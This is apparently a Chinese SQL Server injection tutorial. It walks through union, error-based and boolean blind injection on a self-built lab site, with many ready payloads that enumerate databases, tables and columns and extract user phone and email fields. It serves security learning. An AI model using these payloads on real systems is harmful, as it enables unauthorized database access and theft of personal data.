目录
一、如何判断该网站使用的是sql server 数据库
二、sql server 数据库包含三张主要系统表
三、sql server 主要函数
四、数据库的注入流程
五、sql server 的联合查询
六、sql server 的报错注入
七、sql server 的布尔型盲注。
1.使用union关键字
2.使用union联合查询注意事项
3.sql server 数据库使用联合查询的演示。
注:该网站为个人搭建的网站,不可利用真实网站进行攻击。
3.1首先判断注入点,其次判断注入类型
加入单引号,发现有报错信息
3.2 直接使用2-1判断其数据类型
发现页面回显成功,所以可以确定为数字型,接下来使用union联合查询
3.3 使用order by 判断其列数
可以发现列数为13列
3.4 确认每列的数据类型,所以发现数据类型不兼容,可以使用null 做替换
当我们全部使用null时,发现还是不对,产生这一错误的原因是union语句合并查询时是默认去除重复项的,也就是默认执行了distinct操作。
因此需要将union 改为 union all 不去除重复项,就能够解决这个报错。一般到这里之后就可以直接接着往下获取数据库了, 但是这里的环境有报错了,说明查询出来的时候,还存在数据类型不匹配,继续从头替换为null ,直到不报错为止。最终确定为3,4,6,7,10,11为字符 , 1,2,5,8,9,12,13为数字型
3.5 现在可以首页联合查询获取数据库的相关信息
3.5.1 获取数据库库名
payload:id=1 UNION all SELECT 1,2,name,null,5,null,null,8,9,null,null,12,13 from master..sysdatabases
3.5.2 获取当前数据库的库名
payload:id=1 UNION all SELECT 1,2,db_name(),null,5,null,null,8,9,null,null,12,13 from master..sysdatabases
3.5.3 获取数据库中的表名
payload:id=1 UNION all SELECT 1,2,name,null,5,null,null,8,9,null,null,12,13 from jiaofan..sysobjects where xtype = 0x75
3.5.4 获取当前表名的字段
payload:id=1 UNION all SELECT 1,2,name,null,5,null,null,8,9,null,null,12,13 from jiaofan..syscolumns where id = (select id from jiaofan..sysobjects where name = 0x73006C005F007500730065007200)
5.3.5 获取字段下具体的值
payload:id=1 UNION all SELECT 1,2,shouji,null,5,youxiang,null,8,9,null,null,12,13 from sl_user
与其他数据库报错注入类似。
1.sql server 报错注入的演示
1.1获取当前数据库
payload:id=1 and 1=(select db_name())
1.2获取所有数据库(由于我们使用的是and 1= ()进行的报错,所以一次只能获取一个值,这时可以使用top函数)
payload:id=1 and 1= (select top 1 name from master..sysdatabases)
如果想获取第二行数据,
payload:id=1 and 1= (select top 1 name from master..sysdatabases where name not in( select top 1 name from master..sysdatabases ))
1.3获取当前数据库的表名
payload:id=1 and 1= (select top 1 name from jiaofan..sysobjects where xtype = 0x75)
1.4获取表中的字段名
由于涉及到两张表,所以可以将两张表联合起来
payload:id=1 and 1= (select top 1 c.name from jiaofan..syscolumns c ,jiaofan..sysobjects o where c.id = o.id and o.name =0x73006C005F007500730065007200 )
1.sql server 布尔型盲注的演示
1.1获取数据库的数据库个数
payload:id=1 and (select count(*) from master..sysdatabases) >7
id=1 and (select count(*) from master..sysdatabases) >8
1.2获取当前数据库的信息
payload:id=1 and substring((select db_name()),1,1)=char(106)